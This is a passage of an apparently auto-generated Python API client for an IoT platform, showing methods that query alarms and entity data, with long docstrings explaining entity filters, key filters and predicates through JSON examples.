This method description defines how Alarm Data Query extends the Entity Data Query. See method 'Find Entity Data by Query' first to get the info about 'Entity Data Query'. The platform will first search the entities that match the entity and key filters. Then, the platform will use 'Alarm Page Link' to filter the alarms related to those entities. Finally, platform fetch the properties of alarm that are defined in the **'alarmFields'** and combine them with the other entity, attribute and latest time-series fields to return the result. See example of the alarm query below. The query will search first 100 active alarms with type 'Temperature Alarm' or 'Fire Alarm' for any device with current temperature > 0. The query will return combination of the entity fields: name of the device, device model and latest temperature reading and alarms fields: createdTime, type, severity and status: ```json { \"entityFilter\": { \"type\": \"entityType\", \"resolveMultiple\": true, \"entityType\": \"DEVICE\" }, \"pageLink\": { \"page\": 0, \"pageSize\": 100, \"textSearch\": null, \"searchPropagatedAlarms\": false, \"statusList\": [ \"ACTIVE\" ], \"severityList\": [ \"CRITICAL\", \"MAJOR\" ], \"typeList\": [ \"Temperature Alarm\", \"Fire Alarm\" ], \"sortOrder\": { \"key\": { \"key\": \"createdTime\", \"type\": \"ALARM_FIELD\" }, \"direction\": \"DESC\" }, \"timeWindow\": 86400000 }, \"keyFilters\": [ { \"key\": { \"type\": \"TIME_SERIES\", \"key\": \"temperature\" }, \"valueType\": \"NUMERIC\", \"predicate\": { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 0, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } } ], \"alarmFields\": [ { \"type\": \"ALARM_FIELD\", \"key\": \"createdTime\" }, { \"type\": \"ALARM_FIELD\", \"key\": \"type\" }, { \"type\": \"ALARM_FIELD\", \"key\": \"severity\" }, { \"type\": \"ALARM_FIELD\", \"key\": \"status\" } ], \"entityFields\": [ { \"type\": \"ENTITY_FIELD\", \"key\": \"name\" } ], \"latestValues\": [ { \"type\": \"ATTRIBUTE\", \"key\": \"model\" }, { \"type\": \"TIME_SERIES\", \"key\": \"temperature\" } ] } ``` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_alarm_data_by_query_using_post(async_req=True)
>>> result = thread.get()
:param async_req bool
:param AlarmDataQuery body:
:return: PageDataAlarmData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.find_alarm_data_by_query_using_post_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.find_alarm_data_by_query_using_post_with_http_info(**kwargs) # noqa: E501
return data
def find_alarm_data_by_query_using_post_with_http_info(self, **kwargs): # noqa: E501
"""Find Alarms by Query # noqa: E501
This method description defines how Alarm Data Query extends the Entity Data Query. See method 'Find Entity Data by Query' first to get the info about 'Entity Data Query'. The platform will first search the entities that match the entity and key filters. Then, the platform will use 'Alarm Page Link' to filter the alarms related to those entities. Finally, platform fetch the properties of alarm that are defined in the **'alarmFields'** and combine them with the other entity, attribute and latest time-series fields to return the result. See example of the alarm query below. The query will search first 100 active alarms with type 'Temperature Alarm' or 'Fire Alarm' for any device with current temperature > 0. The query will return combination of the entity fields: name of the device, device model and latest temperature reading and alarms fields: createdTime, type, severity and status: ```json { \"entityFilter\": { \"type\": \"entityType\", \"resolveMultiple\": true, \"entityType\": \"DEVICE\" }, \"pageLink\": { \"page\": 0, \"pageSize\": 100, \"textSearch\": null, \"searchPropagatedAlarms\": false, \"statusList\": [ \"ACTIVE\" ], \"severityList\": [ \"CRITICAL\", \"MAJOR\" ], \"typeList\": [ \"Temperature Alarm\", \"Fire Alarm\" ], \"sortOrder\": { \"key\": { \"key\": \"createdTime\", \"type\": \"ALARM_FIELD\" }, \"direction\": \"DESC\" }, \"timeWindow\": 86400000 }, \"keyFilters\": [ { \"key\": { \"type\": \"TIME_SERIES\", \"key\": \"temperature\" }, \"valueType\": \"NUMERIC\", \"predicate\": { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 0, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } } ], \"alarmFields\": [ { \"type\": \"ALARM_FIELD\", \"key\": \"createdTime\" }, { \"type\": \"ALARM_FIELD\", \"key\": \"type\" }, { \"type\": \"ALARM_FIELD\", \"key\": \"severity\" }, { \"type\": \"ALARM_FIELD\", \"key\": \"status\" } ], \"entityFields\": [ { \"type\": \"ENTITY_FIELD\", \"key\": \"name\" } ], \"latestValues\": [ { \"type\": \"ATTRIBUTE\", \"key\": \"model\" }, { \"type\": \"TIME_SERIES\", \"key\": \"temperature\" } ] } ``` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_alarm_data_by_query_using_post_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param AlarmDataQuery body:
:return: PageDataAlarmData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method find_alarm_data_by_query_using_post" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/alarmsQuery/find', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageDataAlarmData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def find_entity_data_by_query_using_post(self, **kwargs): # noqa: E501
"""Find Entity Data by Query # noqa: E501
Allows to run complex queries over platform entities (devices, assets, customers, etc) based on the combination of main entity filter and multiple key filters. Returns the paginated result of the query that contains requested entity fields and latest values of requested attributes and time-series data. # Query Definition Main **entity filter** is mandatory and defines generic search criteria. For example, \"find all devices with profile 'Moisture Sensor'\" or \"Find all devices related to asset 'Building A'\" Optional **key filters** allow to filter results of the **entity filter** by complex criteria against main entity fields (name, label, type, etc), attributes and telemetry. For example, \"temperature > 20 or temperature< 10\" or \"name starts with 'T', and attribute 'model' is 'T1000', and timeseries field 'batteryLevel' > 40\". The **entity fields** and **latest values** contains list of entity fields and latest attribute/telemetry fields to fetch for each entity. The **page link** contains information about the page to fetch and the sort ordering. Let's review the example: ```json { \"entityFilter\": { \"type\": \"entityType\", \"resolveMultiple\": true, \"entityType\": \"DEVICE\" }, \"keyFilters\": [ { \"key\": { \"type\": \"TIME_SERIES\", \"key\": \"temperature\" }, \"valueType\": \"NUMERIC\", \"predicate\": { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 0, \"dynamicValue\": { \"sourceType\": \"CURRENT_USER\", \"sourceAttribute\": \"temperatureThreshold\", \"inherit\": false } }, \"type\": \"NUMERIC\" } } ], \"entityFields\": [ { \"type\": \"ENTITY_FIELD\", \"key\": \"name\" }, { \"type\": \"ENTITY_FIELD\", \"key\": \"label\" }, { \"type\": \"ENTITY_FIELD\", \"key\": \"additionalInfo\" } ], \"latestValues\": [ { \"type\": \"ATTRIBUTE\", \"key\": \"model\" }, { \"type\": \"TIME_SERIES\", \"key\": \"temperature\" } ], \"pageLink\": { \"page\": 0, \"pageSize\": 10, \"sortOrder\": { \"key\": { \"key\": \"name\", \"type\": \"ENTITY_FIELD\" }, \"direction\": \"ASC\" } } } ``` Example mentioned above search all devices which have attribute 'active' set to 'true'. Now let's review available entity filters and key filters syntax: # Entity Filters Entity Filter body depends on the 'type' parameter. Let's review available entity filter types. In fact, they do correspond to available dashboard aliases. ## Single Entity Allows to filter only one entity based on the id. For example, this entity filter selects certain device: ```json { \"type\": \"singleEntity\", \"singleEntity\": { \"id\": \"d521edb0-2a7a-11ec-94eb-213c95f54092\", \"entityType\": \"DEVICE\" } } ``` ## Entity List Filter Allows to filter entities of the same type using their ids. For example, this entity filter selects two devices: ```json { \"type\": \"entityList\", \"entityType\": \"DEVICE\", \"entityList\": [ \"e6501f30-2a7a-11ec-94eb-213c95f54092\", \"e6657bf0-2a7a-11ec-94eb-213c95f54092\" ] } ``` ## Entity Name Filter Allows to filter entities of the same type using the **'starts with'** expression over entity name. For example, this entity filter selects all devices which name starts with 'Air Quality': ```json { \"type\": \"entityName\", \"entityType\": \"DEVICE\", \"entityNameFilter\": \"Air Quality\" } ``` ## Entity Type Filter Allows to filter entities based on their type (CUSTOMER, USER, DASHBOARD, ASSET, DEVICE, etc)For example, this entity filter selects all tenant customers: ```json { \"type\": \"entityType\", \"entityType\": \"CUSTOMER\" } ``` ## Asset Type Filter Allows to filter assets based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'charging station' assets which name starts with 'Tesla': ```json { \"type\": \"assetType\", \"assetType\": \"charging station\", \"assetNameFilter\": \"Tesla\" } ``` ## Device Type Filter Allows to filter devices based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Temperature Sensor' devices which name starts with 'ABC': ```json { \"type\": \"deviceType\", \"deviceType\": \"Temperature Sensor\", \"deviceNameFilter\": \"ABC\" } ``` ## Edge Type Filter Allows to filter edge instances based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Factory' edge instances which name starts with 'Nevada': ```json { \"type\": \"edgeType\", \"edgeType\": \"Factory\", \"edgeNameFilter\": \"Nevada\" } ``` ## Entity View Filter Allows to filter entity views based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Concrete Mixer' entity views which name starts with 'CAT': ```json { \"type\": \"entityViewType\", \"entityViewType\": \"Concrete Mixer\", \"entityViewNameFilter\": \"CAT\" } ``` ## Api Usage Filter Allows to query for Api Usage based on optional customer id. If the customer id is not set, returns current tenant API usage.For example, this entity filter selects the 'Api Usage' entity for customer with id 'e6501f30-2a7a-11ec-94eb-213c95f54092': ```json { \"type\": \"apiUsageState\", \"customerId\": { \"id\": \"d521edb0-2a7a-11ec-94eb-213c95f54092\", \"entityType\": \"CUSTOMER\" } } ``` ## Relations Query Filter Allows to filter entities that are related to the provided root entity. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels should the query search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines either to return all related entities or only entities that are on the last level of relations. The 'filter' object allows you to define the relation type and set of acceptable entity types to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only those who match the 'filters'. For example, this entity filter selects all devices and assets which are related to the asset with id 'e51de0c0-2a7a-11ec-94eb-213c95f54092': ```json { \"type\": \"relationsQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e51de0c0-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 1, \"fetchLastLevelOnly\": false, \"filters\": [ { \"relationType\": \"Contains\", \"entityTypes\": [ \"DEVICE\", \"ASSET\" ] } ] } ``` ## Asset Search Query Allows to filter assets that are related to the provided root entity. Filters related assets based on the relation type and set of asset types. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels should the query search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines either to return all related entities or only entities that are on the last level of relations. The 'relationType' defines the type of the relation to search for. The 'assetTypes' defines the type of the asset to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only assets that match 'relationType' and 'assetTypes' conditions. For example, this entity filter selects 'charging station' assets which are related to the asset with id 'e51de0c0-2a7a-11ec-94eb-213c95f54092' using 'Contains' relation: ```json { \"type\": \"assetSearchQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e51de0c0-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 1, \"fetchLastLevelOnly\": false, \"relationType\": \"Contains\", \"assetTypes\": [ \"charging station\" ] } ``` ## Device Search Query Allows to filter devices that are related to the provided root entity. Filters related devices based on the relation type and set of device types. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels should the query search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines either to return all related entities or only entities that are on the last level of relations. The 'relationType' defines the type of the relation to search for. The 'deviceTypes' defines the type of the device to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only devices that match 'relationType' and 'deviceTypes' conditions. For example, this entity filter selects 'Charging port' and 'Air Quality Sensor' devices which are related to the asset with id 'e52b0020-2a7a-11ec-94eb-213c95f54092' using 'Contains' relation: ```json { \"type\": \"deviceSearchQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e52b0020-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 2, \"fetchLastLevelOnly\": true, \"relationType\": \"Contains\", \"deviceTypes\": [ \"Air Quality Sensor\", \"Charging port\" ] } ``` ## Entity View Query Allows to filter entity views that are related to the provided root entity. Filters related entity views based on the relation type and set of entity view types. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels should the query search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines either to return all related entities or only entities that are on the last level of relations. The 'relationType' defines the type of the relation to search for. The 'entityViewTypes' defines the type of the entity view to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only devices that match 'relationType' and 'deviceTypes' conditions. For example, this entity filter selects 'Concrete mixer' entity views which are related to the asset with id 'e52b0020-2a7a-11ec-94eb-213c95f54092' using 'Contains' relation: ```json { \"type\": \"entityViewSearchQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e52b0020-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 1, \"fetchLastLevelOnly\": false, \"relationType\": \"Contains\", \"entityViewTypes\": [ \"Concrete mixer\" ] } ``` ## Edge Search Query Allows to filter edge instances that are related to the provided root entity. Filters related edge instances based on the relation type and set of edge types. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels should the query search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines either to return all related entities or only entities that are on the last level of relations. The 'relationType' defines the type of the relation to search for. The 'deviceTypes' defines the type of the device to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only devices that match 'relationType' and 'deviceTypes' conditions. For example, this entity filter selects 'Factory' edge instances which are related to the asset with id 'e52b0020-2a7a-11ec-94eb-213c95f54092' using 'Contains' relation: ```json { \"type\": \"deviceSearchQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e52b0020-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 2, \"fetchLastLevelOnly\": true, \"relationType\": \"Contains\", \"edgeTypes\": [ \"Factory\" ] } ``` # Key Filters Key Filter allows you to define complex logical expressions over entity field, attribute or latest time-series value. The filter is defined using 'key', 'valueType' and 'predicate' objects. Single Entity Query may have zero, one or multiple predicates. If multiple filters are defined, they are evaluated using logical 'AND'. The example below checks that temperature of the entity is above 20 degrees: ```json { \"key\": { \"type\": \"TIME_SERIES\", \"key\": \"temperature\" }, \"valueType\": \"NUMERIC\", \"predicate\": { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 20, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } } ``` Now let's review 'key', 'valueType' and 'predicate' objects in detail. ## Filter Key Filter Key defines either entity field, attribute or telemetry. It is a JSON object that consists the key name and type. The following filter key types are supported: * 'CLIENT_ATTRIBUTE' - used for client attributes; * 'SHARED_ATTRIBUTE' - used for shared attributes; * 'SERVER_ATTRIBUTE' - used for server attributes; * 'ATTRIBUTE' - used for any of the above; * 'TIME_SERIES' - used for time-series values; * 'ENTITY_FIELD' - used for accessing entity fields like 'name', 'label', etc. The list of available fields depends on the entity type; * 'ALARM_FIELD' - similar to entity field, but is used in alarm queries only; Let's review the example: ```json { \"type\": \"TIME_SERIES\", \"key\": \"temperature\" } ``` ## Value Type and Operations Provides a hint about the data type of the entity field that is defined in the filter key. The value type impacts the list of possible operations that you may use in the corresponding predicate. For example, you may use 'STARTS_WITH' or 'END_WITH', but you can't use 'GREATER_OR_EQUAL' for string values.The following filter value types and corresponding predicate operations are supported: * 'STRING' - used to filter any 'String' or 'JSON' values. Operations: EQUAL, NOT_EQUAL, STARTS_WITH, ENDS_WITH, CONTAINS, NOT_CONTAINS; * 'NUMERIC' - used for 'Long' and 'Double' values. Operations: EQUAL, NOT_EQUAL, GREATER, LESS, GREATER_OR_EQUAL, LESS_OR_EQUAL; * 'BOOLEAN' - used for boolean values. Operations: EQUAL, NOT_EQUAL; * 'DATE_TIME' - similar to numeric, transforms value to milliseconds since epoch. Operations: EQUAL, NOT_EQUAL, GREATER, LESS, GREATER_OR_EQUAL, LESS_OR_EQUAL; ## Filter Predicate Filter Predicate defines the logical expression to evaluate. The list of available operations depends on the filter value type, see above. Platform supports 4 predicate types: 'STRING', 'NUMERIC', 'BOOLEAN' and 'COMPLEX'. The last one allows to combine multiple operations over one filter key. Simple predicate example to check 'value < 100': ```json { \"operation\": \"LESS\", \"value\": { \"defaultValue\": 100, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } ``` Complex predicate example, to check 'value < 10 or value > 20': ```json { \"type\": \"COMPLEX\", \"operation\": \"OR\", \"predicates\": [ { \"operation\": \"LESS\", \"value\": { \"defaultValue\": 10, \"dynamicValue\": null }, \"type\": \"NUMERIC\" }, { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 20, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } ] } ``` More complex predicate example, to check 'value < 10 or (value > 50 && value < 60)': ```json { \"type\": \"COMPLEX\", \"operation\": \"OR\", \"predicates\": [ { \"operation\": \"LESS\", \"value\": { \"defaultValue\": 10, \"dynamicValue\": null }, \"type\": \"NUMERIC\" }, { \"type\": \"COMPLEX\", \"operation\": \"AND\", \"predicates\": [ { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 50, \"dynamicValue\": null }, \"type\": \"NUMERIC\" }, { \"operation\": \"LESS\", \"value\": { \"defaultValue\": 60, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } ] } ] } ``` You may also want to replace hardcoded values (for example, temperature > 20) with the more dynamic expression (for example, temperature > 'value of the tenant attribute with key 'temperatureThreshold'). It is possible to use 'dynamicValue' to define attribute of the tenant, customer or user that is performing the API call. See example below: ```json { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 0, \"dynamicValue\": { \"sourceType\": \"CURRENT_USER\", \"sourceAttribute\": \"temperatureThreshold\" } }, \"type\": \"NUMERIC\" } ``` Note that you may use 'CURRENT_USER', 'CURRENT_CUSTOMER' and 'CURRENT_TENANT' as a 'sourceType'. The 'defaultValue' is used when the attribute with such a name is not defined for the chosen source. Available for users with 'TENANT_ADMIN' or 'CUSTOMER_USER' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_entity_data_by_query_using_post(async_req=True)
>>> result = thread.get()
:param async_req bool
:param EntityDataQuery body:
:return: PageDataEntityData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.find_entity_data_by_query_using_post_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.find_entity_data_by_query_using_post_with_http_info(**kwargs) # noqa: E501
return data
def find_entity_data_by_query_using_post_with_http_info(self, **kwargs): # noqa: E501
"""Find Entity Data by Query # noqa: E501
Allows to run complex queries over platform entities (devices, assets, customers, etc) based on the combination of main entity filter and multiple key filters. Returns the paginated result of the query that contains requested entity fields and latest values of requested attributes and time-series data. # Query Definition Main **entity filter** is mandatory and defines generic search criteria. For example, \"find all devices with profile 'Moisture Sensor'\" or \"Find all devices related to asset 'Building A'\" Optional **key filters** allow to filter results of the **entity filter** by complex criteria against main entity fields (name, label, type, etc), attributes and telemetry. For example, \"temperature > 20 or temperature< 10\" or \"name starts with 'T', and attribute 'model' is 'T1000', and timeseries field 'batteryLevel' > 40\". The **entity fields** and **latest values** contains list of entity fields and latest attribute/telemetry fields to fetch for each entity. The **page link** contains information about the page to fetch and the sort ordering. Let's review the example: ```json { \"entityFilter\": { \"type\": \"entityType\", \"resolveMultiple\": true, \"entityType\": \"DEVICE\" }, \"keyFilters\": [ { \"key\": { \"type\": \"TIME_SERIES\", \"key\": \"temperature\" }, \"valueType\": \"NUMERIC\", \"predicate\": { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 0, \"dynamicValue\": { \"sourceType\": \"CURRENT_USER\", \"sourceAttribute\": \"temperatureThreshold\", \"inherit\": false } }, \"type\": \"NUMERIC\" } } ], \"entityFields\": [ { \"type\": \"ENTITY_FIELD\", \"key\": \"name\" }, { \"type\": \"ENTITY_FIELD\", \"key\": \"label\" }, { \"type\": \"ENTITY_FIELD\", \"key\": \"additionalInfo\" } ], \"latestValues\": [ { \"type\": \"ATTRIBUTE\", \"key\": \"model\" }, { \"type\": \"TIME_SERIES\", \"key\": \"temperature\" } ], \"pageLink\": { \"page\": 0, \"pageSize\": 10, \"sortOrder\": { \"key\": { \"key\": \"name\", \"type\": \"ENTITY_FIELD\" }, \"direction\": \"ASC\" } } } ``` Example mentioned above search all devices which have attribute 'active' set to 'true'. Now let's review available entity filters and key filters syntax: # Entity Filters Entity Filter body depends on the 'type' parameter. Let's review available entity filter types. In fact, they do correspond to available dashboard aliases. ## Single Entity Allows to filter only one entity based on the id. For example, this entity filter selects certain device: ```json { \"type\": \"singleEntity\", \"singleEntity\": { \"id\": \"d521edb0-2a7a-11ec-94eb-213c95f54092\", \"entityType\": \"DEVICE\" } } ``` ## Entity List Filter Allows to filter entities of the same type using their ids. For example, this entity filter selects two devices: ```json { \"type\": \"entityList\", \"entityType\": \"DEVICE\", \"entityList\": [ \"e6501f30-2a7a-11ec-94eb-213c95f54092\", \"e6657bf0-2a7a-11ec-94eb-213c95f54092\" ] } ``` ## Entity Name Filter Allows to filter entities of the same type using the **'starts with'** expression over entity name. For example, this entity filter selects all devices which name starts with 'Air Quality': ```json { \"type\": \"entityName\", \"entityType\": \"DEVICE\", \"entityNameFilter\": \"Air Quality\" } ``` ## Entity Type Filter Allows to filter entities based on their type (CUSTOMER, USER, DASHBOARD, ASSET, DEVICE, etc)For example, this entity filter selects all tenant customers: ```json { \"type\": \"entityType\", \"entityType\": \"CUSTOMER\" } ``` ## Asset Type Filter Allows to filter assets based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'charging station' assets which name starts with 'Tesla': ```json { \"type\": \"assetType\", \"assetType\": \"charging station\", \"assetNameFilter\": \"Tesla\" } ``` ## Device Type Filter Allows to filter devices based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Temperature Sensor' devices which name starts with 'ABC': ```json { \"type\": \"deviceType\", \"deviceType\": \"Temperature Sensor\", \"deviceNameFilter\": \"ABC\" } ``` ## Edge Type Filter Allows to filter edge instances based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Factory' edge instances which name starts with 'Nevada': ```json { \"type\": \"edgeType\", \"edgeType\": \"Factory\", \"edgeNameFilter\": \"Nevada\" } ``` ## Entity View Filter Allows to filter entity views based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Concrete Mixer' entity views which name starts with 'CAT': ```json { \"type\": \"entityViewType\", \"entityViewType\": \"Concrete Mixer\", \"entityViewNameFilter\": \"CAT\" } ``` ## Api Usage Filter Allows to query for Api Usage based on optional customer id. If the customer id is not set, returns current tenant API usage.For example, this entity filter selects the 'Api Usage' entity for customer with id 'e6501f30-2a7a-11ec-94eb-213c95f54092': ```json { \"type\": \"apiUsageState\", \"customerId\": { \"id\": \"d521edb0-2a7a-11ec-94eb-213c95f54092\", \"entityType\": \"CUSTOMER\" } } ``` ## Relations Query Filter Allows to filter entities that are related to the provided root entity. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels should the query search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines either to return all related entities or only entities that are on the last level of relations. The 'filter' object allows you to define the relation type and set of acceptable entity types to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only those who match the 'filters'. For example, this entity filter selects all devices and assets which are related to the asset with id 'e51de0c0-2a7a-11ec-94eb-213c95f54092': ```json { \"type\": \"relationsQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e51de0c0-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 1, \"fetchLastLevelOnly\": false, \"filters\": [ { \"relationType\": \"Contains\", \"entityTypes\": [ \"DEVICE\", \"ASSET\" ] } ] } ``` ## Asset Search Query Allows to filter assets that are related to the provided root entity. Filters related assets based on the relation type and set of asset types. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels should the query search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines either to return all related entities or only entities that are on the last level of relations. The 'relationType' defines the type of the relation to search for. The 'assetTypes' defines the type of the asset to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only assets that match 'relationType' and 'assetTypes' conditions. For example, this entity filter selects 'charging station' assets which are related to the asset with id 'e51de0c0-2a7a-11ec-94eb-213c95f54092' using 'Contains' relation: ```json { \"type\": \"assetSearchQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e51de0c0-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 1, \"fetchLastLevelOnly\": false, \"relationType\": \"Contains\", \"assetTypes\": [ \"charging station\" ] } ``` ## Device Search Query Allows to filter devices that are related to the provided root entity. Filters related devices based on the relation type and set of device types. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels should the query search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines either to return all related entities or only entities that are on the last level of relations. The 'relationType' defines the type of the relation to search for. The 'deviceTypes' defines the type of the device to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only devices that match 'relationType' and 'deviceTypes' conditions. For example, this entity filter selects 'Charging port' and 'Air Quality Sensor' devices which are related to the asset with id 'e52b0020-2a7a-11ec-94eb-213c95f54092' using 'Contains' relation: ```json { \"type\": \"deviceSearchQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e52b0020-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 2, \"fetchLastLevelOnly\": true, \"relationType\": \"Contains\", \"deviceTypes\": [ \"Air Quality Sensor\", \"Charging port\" ] } ``` ## Entity View Query Allows to filter entity views that are related to the provided root entity. Filters related entity views based on the relation type and set of entity view types. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels should the query search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines either to return all related entities or only entities that are on the last level of relations. The 'relationType' defines the type of the relation to search for. The 'entityViewTypes' defines the type of the entity view to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only devices that match 'relationType' and 'deviceTypes' conditions. For example, this entity filter selects 'Concrete mixer' entity views which are related to the asset with id 'e52b0020-2a7a-11ec-94eb-213c95f54092' using 'Contains' relation: ```json { \"type\": \"entityViewSearchQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e52b0020-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 1, \"fetchLastLevelOnly\": false, \"relationType\": \"Contains\", \"entityViewTypes\": [ \"Concrete mixer\" ] } ``` ## Edge Search Query Allows to filter edge instances that are related to the provided root entity. Filters related edge instances based on the relation type and set of edge types. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels should the query search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines either to return all related entities or only entities that are on the last level of relations. The 'relationType' defines the type of the relation to search for. The 'deviceTypes' defines the type of the device to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only devices that match 'relationType' and 'deviceTypes' conditions. For example, this entity filter selects 'Factory' edge instances which are related to the asset with id 'e52b0020-2a7a-11ec-94eb-213c95f54092' using 'Contains' relation: ```json { \"type\": \"deviceSearchQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e52b0020-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 2, \"fetchLastLevelOnly\": true, \"relationType\": \"Contains\", \"edgeTypes\": [ \"Factory\" ] } ``` # Key Filters Key Filter allows you to define complex logical expressions over entity field, attribute or latest time-series value. The filter is defined using 'key', 'valueType' and 'predicate' objects. Single Entity Query may have zero, one or multiple predicates. If multiple filters are defined, they are evaluated using logical 'AND'. The example below checks that temperature of the entity is above 20 degrees: ```json { \"key\": { \"type\": \"TIME_SERIES\", \"key\": \"temperature\" }, \"valueType\": \"NUMERIC\", \"predicate\": { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 20, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } } ``` Now let's review 'key', 'valueType' and 'predicate' objects in detail. ## Filter Key Filter Key defines either entity field, attribute or telemetry. It is a JSON object that consists the key name and type. The following filter key types are supported: * 'CLIENT_ATTRIBUTE' - used for client attributes; * 'SHARED_ATTRIBUTE' - used for shared attributes; * 'SERVER_ATTRIBUTE' - used for server attributes; * 'ATTRIBUTE' - used for any of the above; * 'TIME_SERIES' - used for time-series values; * 'ENTITY_FIELD' - used for 